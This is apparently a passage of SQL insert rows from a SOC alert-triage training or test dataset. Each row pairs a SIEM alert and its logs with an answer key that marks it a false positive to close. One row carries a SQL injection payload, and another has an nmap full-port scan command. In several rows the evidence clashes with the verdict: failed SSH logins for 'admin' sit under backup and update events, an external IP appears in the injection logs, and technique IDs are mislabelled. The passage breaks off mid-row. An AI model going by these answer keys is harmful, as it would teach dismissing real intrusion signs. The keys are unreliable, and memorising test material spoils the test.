(1788, 'Routine IT Vulnerability Scanning Detected', 'low', 'Splunk', 'A series of network scanning activities originating from an internal IP was detected. This is consistent with scheduled vulnerability assessments conducted by the IT department.', 'Lateral Movement', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.5\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin_user\",\"hostname\":\"scanner01\",\"command_line\":\"nmap -sS -p 1-65535 192.168.1.10\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network scanning from authorized IT tools.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This activity matches the profile of routine IT vulnerability scanning and is corroborated by the use of known internal tools.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.298Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"scanner01\\\",\\\"command_line\\\":\\\"nmap -sS -p 1-65535 192.168.1.10\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.298Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"scanner01\\\",\\\"command_line\\\":\\\"nmap -sS -p 1-65535 192.168.1.10\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.298Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"scanner01\\\",\\\"command_line\\\":\\\"nmap -sS -p 1-65535 192.168.1.10\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.298Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"scanner01\\\",\\\"command_line\\\":\\\"nmap -sS -p 1-65535 192.168.1.10\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.298Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"scanner01\\\",\\\"command_line\\\":\\\"nmap -sS -p 1-65535 192.168.1.10\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1789, 'Suspicious System Health Check Activity', 'low', 'Elastic SIEM', 'Detected multiple system health checks from a known internal IP. Checks are part of regular system maintenance operations.', 'Execution', 'T1053', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"10.0.0.20\",\"username\":\"sys_maint\",\"hostname\":\"healthcheck_server\",\"command_line\":\"healthcheck_tool --run-full-scan\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in regular system maintenance checks.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"The detected process is a legitimate system health check routinely performed by the IT department.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.300Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T05:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"sys_maint\\\",\\\"hostname\\\":\\\"healthcheck_server\\\",\\\"command_line\\\":\\\"healthcheck_tool --run-full-scan\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.300Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T05:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"sys_maint\\\",\\\"hostname\\\":\\\"healthcheck_server\\\",\\\"command_line\\\":\\\"healthcheck_tool --run-full-scan\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.300Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T05:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"sys_maint\\\",\\\"hostname\\\":\\\"healthcheck_server\\\",\\\"command_line\\\":\\\"healthcheck_tool --run-full-scan\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.300Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T05:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"sys_maint\\\",\\\"hostname\\\":\\\"healthcheck_server\\\",\\\"command_line\\\":\\\"healthcheck_tool --run-full-scan\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.300Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T05:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"sys_maint\\\",\\\"hostname\\\":\\\"healthcheck_server\\\",\\\"command_line\\\":\\\"healthcheck_tool --run-full-scan\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1790, 'Authorized Administrative Backup Activity', 'low', 'Wazuh', 'An administrative backup process was executed from a known internal server. This is part of scheduled backup operations.', 'Persistence', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.50\",\"dst_ip\":\"192.168.2.100\",\"username\":\"backup_admin\",\"hostname\":\"backup_server\",\"command_line\":\"backup_tool --full-backup --target 192.168.2.100\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"IP involved in authorized backup operations.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"persistence\",\"analysis_notes\":\"The log indicates a scheduled backup process performed by an authorized admin, hence classified as a false positive.\"}', 'Intermediate', 'SIEM', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.301Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T02:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"192.168.2.100\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup_server\\\",\\\"command_line\\\":\\\"backup_tool --full-backup --target 192.168.2.100\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.301Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T02:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"192.168.2.100\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup_server\\\",\\\"command_line\\\":\\\"backup_tool --full-backup --target 192.168.2.100\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.301Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T02:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"192.168.2.100\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup_server\\\",\\\"command_line\\\":\\\"backup_tool --full-backup --target 192.168.2.100\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.301Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T02:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"192.168.2.100\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup_server\\\",\\\"command_line\\\":\\\"backup_tool --full-backup --target 192.168.2.100\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.301Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T02:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"192.168.2.100\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup_server\\\",\\\"command_line\\\":\\\"backup_tool --full-backup --target 192.168.2.100\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1791, 'Legacy Application Misconfiguration Detected', 'medium', 'Azure Sentinel', 'A legacy application attempted to access network resources using outdated protocols. This behavior is consistent with known application misconfiguration.', 'Initial Access', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.75\",\"dst_ip\":\"192.168.3.80\",\"username\":\"legacy_app\",\"hostname\":\"legacy_server\",\"command_line\":\"connect --protocol old_protocol --dst 192.168.3.80\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Legacy application accessing internal resources with known outdated protocols.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"initial_access\",\"analysis_notes\":\"This alert is triggered by a known application misconfiguration and does not represent unauthorized access.\"}', 'Intermediate', 'SIEM', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.302Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.75\\\",\\\"dst_ip\\\":\\\"192.168.3.80\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy_server\\\",\\\"command_line\\\":\\\"connect --protocol old_protocol --dst 192.168.3.80\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.302Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.75\\\",\\\"dst_ip\\\":\\\"192.168.3.80\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy_server\\\",\\\"command_line\\\":\\\"connect --protocol old_protocol --dst 192.168.3.80\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.302Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.75\\\",\\\"dst_ip\\\":\\\"192.168.3.80\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy_server\\\",\\\"command_line\\\":\\\"connect --protocol old_protocol --dst 192.168.3.80\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.302Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.75\\\",\\\"dst_ip\\\":\\\"192.168.3.80\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy_server\\\",\\\"command_line\\\":\\\"connect --protocol old_protocol --dst 192.168.3.80\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.302Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.75\\\",\\\"dst_ip\\\":\\\"192.168.3.80\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy_server\\\",\\\"command_line\\\":\\\"connect --protocol old_protocol --dst 192.168.3.80\\\"}\"}],\"query\":\"index=main 
source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1792, 'Authorized System Update Process Executed', 'low', 'Splunk', 'Detected execution of a system update process from an internal IP. This is part of scheduled update operations.', 'Execution', 'T1074', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T06:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.4.5\",\"dst_ip\":\"192.168.4.6\",\"username\":\"update_admin\",\"hostname\":\"update_server\",\"command_line\":\"update_tool --apply-updates\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"IP involved in authorized system updates.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"The activity is authorized and part of routine system update processes; hence, it is a false positive.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.303Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T06:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.5\\\",\\\"dst_ip\\\":\\\"192.168.4.6\\\",\\\"username\\\":\\\"update_admin\\\",\\\"hostname\\\":\\\"update_server\\\",\\\"command_line\\\":\\\"update_tool --apply-updates\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.303Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T06:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.5\\\",\\\"dst_ip\\\":\\\"192.168.4.6\\\",\\\"username\\\":\\\"update_admin\\\",\\\"hostname\\\":\\\"update_server\\\",\\\"command_line\\\":\\\"update_tool --apply-updates\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.303Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T06:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.5\\\",\\\"dst_ip\\\":\\\"192.168.4.6\\\",\\\"username\\\":\\\"update_admin\\\",\\\"hostname\\\":\\\"update_server\\\",\\\"command_line\\\":\\\"update_tool --apply-updates\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.303Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T06:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.5\\\",\\\"dst_ip\\\":\\\"192.168.4.6\\\",\\\"username\\\":\\\"update_admin\\\",\\\"hostname\\\":\\\"update_server\\\",\\\"command_line\\\":\\\"update_tool --apply-updates\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.303Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T06:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.5\\\",\\\"dst_ip\\\":\\\"192.168.4.6\\\",\\\"username\\\":\\\"update_admin\\\",\\\"hostname\\\":\\\"update_server\\\",\\\"command_line\\\":\\\"update_tool --apply-updates\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1793, 'Routine IT Vulnerability Scans Trigger Web Request Alert', 'low', 'Wazuh', 'A routine vulnerability scan from an internal IP triggered an alert due to multiple web requests containing harmless test payloads. The scan is part of scheduled security assessments.', 'Web Attack', 'T1190', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:45:30Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"10.0.0.5\",\"username\":\"svc_scan_user\",\"hostname\":\"scanner.internal\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"command_line\":\"\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for vulnerability scanning.\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Common test payload for SQL injection detection.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"Routine vulnerability scanning using test payloads triggered alerts.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.305Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"svc_scan_user\\\",\\\"hostname\\\":\\\"scanner.internal\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' 
--\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.305Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"svc_scan_user\\\",\\\"hostname\\\":\\\"scanner.internal\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.305Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"svc_scan_user\\\",\\\"hostname\\\":\\\"scanner.internal\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.305Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"svc_scan_user\\\",\\\"hostname\\\":\\\"scanner.internal\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.305Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 
HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"svc_scan_user\\\",\\\"hostname\\\":\\\"scanner.internal\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1794, 'Authorized Administrative Backup Process Detected as Suspicious Execution', 'low', 'Splunk', 'An authorized backup script executed with elevated privileges was flagged due to unusual command line patterns. The script is part of the routine data backup process.', 'Execution', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:15Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.20\",\"dst_ip\":\"\",\"username\":\"backup_admin\",\"hostname\":\"backup-server\",\"request_body\":\"\",\"command_line\":\"/usr/local/bin/backup.sh --full --encrypt\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the backup server.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"/usr/local/bin/backup.sh --full --encrypt\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Authorized backup script execution.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"The execution of authorized backup scripts with encryption options is routine.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.306Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:30:15Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"/usr/local/bin/backup.sh --full 
